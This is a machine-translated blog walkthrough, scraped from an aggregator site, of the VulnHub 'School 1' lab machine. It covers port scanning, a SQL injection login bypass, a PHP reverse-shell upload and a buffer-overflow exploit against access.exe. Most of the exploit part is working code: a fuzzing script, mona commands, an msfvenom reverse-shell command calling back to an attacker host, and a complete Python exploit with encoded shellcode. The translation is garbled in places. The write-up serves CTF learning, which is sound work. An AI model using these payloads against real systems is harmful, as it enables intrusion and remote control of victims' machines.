当前位置:网站首页>School 1 of vulnhub
School 1 of vulnhub
2022-07-07 20:07:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 information gathering
Four 、 Background information collection
7、 ... and 、 debugging access.exe file
1. Debugging tools ImmunityDebugger
6.msf-pattern_create Generate 2000 Different characters
8、 ... and 、 Mention right to success
One 、 Live host detection
Two 、 Service version scan
22,80 It is still a regular port . and 23 The port is tcpwrapped, But generally 23 All are telnet
Baidu :
NMAP In the execution result , Port status is often marked with tcpwrapped.tcpwrapped Indicates that the server is running TCP_Wrappers service .TCP_Wrappers It's an application level firewall . It can be based on presupposition , Yes SSH、Telnet、FTP Service requests are intercepted , Judge whether it meets the preset requirements . If meet , It will be forwarded to the corresponding service process ; otherwise , Will interrupt the connection request .
3、 ... and 、 information gathering
For a login box ,
1. Get account password ( Blast , Through source code disclosure , Weak password to try )
2. Try to inject
Always be true and inject success
In fact, there is no final - It's fine too , But the space must be added , Compare the password with the back and splice it , Only in this way can we inject success
ss ' or 1=1 -- -
Four 、 Background information collection
1. Reflex type xss
These pages all exist xss, But! , It's useless for us to break through the border
There are also in the last box .
2. Source code
Particular attention javascript And the content in the notes . Here is a hidden path , There is also a save folder for uploading files .
5、 ... and 、 Upload files
There is a file upload place under the hidden directory .
1. Upload php rebound shell file
2. Visiting this page again triggers
6、 ... and 、wine
wine: To put it simply, you can linux Come up and run windous The program .
win The content of :
Yes access.exe file .
We got him windous Come up and debug , See if there are loopholes .
7、 ... and 、 debugging access.exe file
1. Debugging tools ImmunityDebugger
You can find the official website to download
2. download mona Script
github There are , Download and put it here .
3. Start the process
It indicates that there are loopholes .
4. Write python Script
It mainly depends on whether there is a buffer overflow vulnerability in this program , If there is a buffer overflow , So where is the overflow location .
#!/usr/bin/python2
import sys,socket
payload='A'*2000
try:
s=socket.socket()
s.connect(('192.168.0.',23))
s.send((payload))
s.close()
except:
print('wrong')
sys.exit()
5. Program downtime
This also proves that there is a buffer overflow vulnerability .
6.msf-pattern_create Generate 2000 Different characters
msf-pattern_create -l 2000
7. Lookup location
8.EIP->ESP
EIP Jump in ESP The address of the register ,ESP Register we put attack payload. find jump ESP The address of
(1)mona Check out the module
!mona modules
(2) Search for jump ESP
!mona find -s "\xff\xe4" -m "funcs_access.dll"
Address=625012D0
9. Detect bad characters
Bad characters will cause our code to fail , These are measured .
\x00\x0a\x4d\x4f\x5f\x79\x7e\x7f
10. Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.109 LPORT=4444 -b '\x00\x4d\x4f\x5f\x79\x7e\x7f' -f c EXITFUNC=thread
11.python Of exp
#! /usr/bin/python2
import sys
import socket
try:
shellcode=("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" "\xce\x93\x58\xfd\x83\xee\xfc\xe2\xf4\x32\x7b\xda\xfd\xce\x93"
"\x38\x74\x2b\xa2\x98\x99\x45\xc3\x68\x76\x9c\x9f\xd3\xaf\xda"
"\x18\x2a\xd5\xc1\x24\x12\xdb\xff\x6c\xf4\xc1\xaf\xef\x5a\xd1"
"\xee\x52\x97\xf0\xcf\x54\xba\x0f\x9c\xc4\xd3\xaf\xde\x18\x12"
"\xc1\x45\xdf\x49\x85\x2d\xdb\x59\x2c\x9f\x18\x01\xdd\xcf\x40"
"\xd3\xb4\xd6\x70\x62\xb4\x45\xa7\xd3\xfc\x18\xa2\xa7\x51\x0f"
"\x5c\x55\xfc\x09\xab\xb8\x88\x38\x90\x25\x05\xf5\xee\x7c\x88"
"\x2a\xcb\xd3\xa5\xea\x92\x8b\x9b\x45\x9f\x13\x76\x96\x8f\x59"
"\x2e\x45\x97\xd3\xfc\x1e\x1a\x1c\xd9\xea\xc8\x03\x9c\x97\xc9"
"\x09\x02\x2e\xcc\x07\xa7\x45\x81\xb3\x70\x93\xfb\x6b\xcf\xce"
"\x93\x30\x8a\xbd\xa1\x07\xa9\xa6\xdf\x2f\xdb\xc9\x6c\x8d\x45"
"\x5e\x92\x58\xfd\xe7\x57\x0c\xad\xa6\xba\xd8\x96\xce\x6c\x8d"
"\xad\x9e\xc3\x08\xbd\x9e\xd3\x08\x95\x24\x9c\x87\x1d\x31\x46"
"\xcf\x97\xcb\xfb\x98\x55\xce\xff\x30\xff\xce\x82\x04\x74\x28"
"\xf9\x48\xab\x99\xfb\xc1\x58\xba\xf2\xa7\x28\x4b\x53\x2c\xf1"
"\x31\xdd\x50\x88\x22\xfb\xa8\x48\x6c\xc5\xa7\x28\xa6\xf0\x35" "\x99\xce\x1a\xbb\xaa\x99\xc4\x69\x0b\xa4\x81\x01\xab\x2c\x6e"
"\x3e\x3a\x8a\xb7\x64\xfc\xcf\x1e\x1c\xd9\xde\x55\x58\xb9\x9a"
"\xc3\x0e\xab\x98\xd5\x0e\xb3\x98\xc5\x0b\xab\xa6\xea\x94\xc2"
"\x48\x6c\x8d\x74\x2e\xdd\x0e\xbb\x31\xa3\x30\xf5\x49\x8e\x38"
"\x02\x1b\x28\xb8\xe0\xe4\x99\x30\x5b\x5b\x2e\xc5\x02\x1b\xaf"
"\x5e\x81\xc4\x13\xa3\x1d\xbb\x96\xe3\xba\xdd\xe1\x37\x97\xce"
"\xc0\xa7\x28")
payload="A"*1902 + "\xdd\x12\x50\x62" + "\x90"*32 + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",23))
s.send(payload)
s.close()
print('done')
except:
print('error')
8、 ... and 、 Mention right to success
here Z:/ Express win Under the root path of deployment , Here is the second one we want to find flag, You can't view it without raising the right ,
Now you can check to prove that the right raising is successful .
边栏推荐
猜你喜欢
Vulnhub tre1
Flink并行度和Slot详解
Implement secondary index with Gaussian redis
8 CAS
Navicat连接2002 - Can‘t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock‘解决
Sword finger offer II 013 Sum of two-dimensional submatrix
PMP對工作有益嗎?怎麼選擇靠譜平臺讓備考更省心省力!!!
【STL】vector
Chapter 9 Yunji datacanvas was rated as 36 krypton "the hard core technology enterprise most concerned by investors"
Open source heavy ware! Chapter 9 the open source project of ylarn causal learning of Yunji datacanvas company will be released soon!
随机推荐
Equals method
力扣 459. 重复的子字符串
Detailed explanation of Flink parallelism and slot
Open source heavy ware! Chapter 9 the open source project of ylarn causal learning of Yunji datacanvas company will be released soon!
【STL】vector
R language uses ggplot2 function to visualize the histogram distribution of counting target variables that need to build Poisson regression model, and analyzes the feasibility of building Poisson regr
力扣 88.合并两个有序数组
Simulate the implementation of string class
LeetCode_ 7_ five
vulnhub之school 1
MSE API学习
使用高斯Redis实现二级索引
equals 方法
ASP.NET学习& asp‘s one word
Boot 和 Cloud 的版本选型
CSDN语法说明
LeetCode力扣(剑指offer 36-39)36. 二叉搜索树与双向链表37. 序列化二叉树38. 字符串的排列39. 数组中出现次数超过一半的数字
[RT thread env tool installation]
强化学习-学习笔记8 | Q-learning
Force buckle 1961 Check whether the string is an array prefix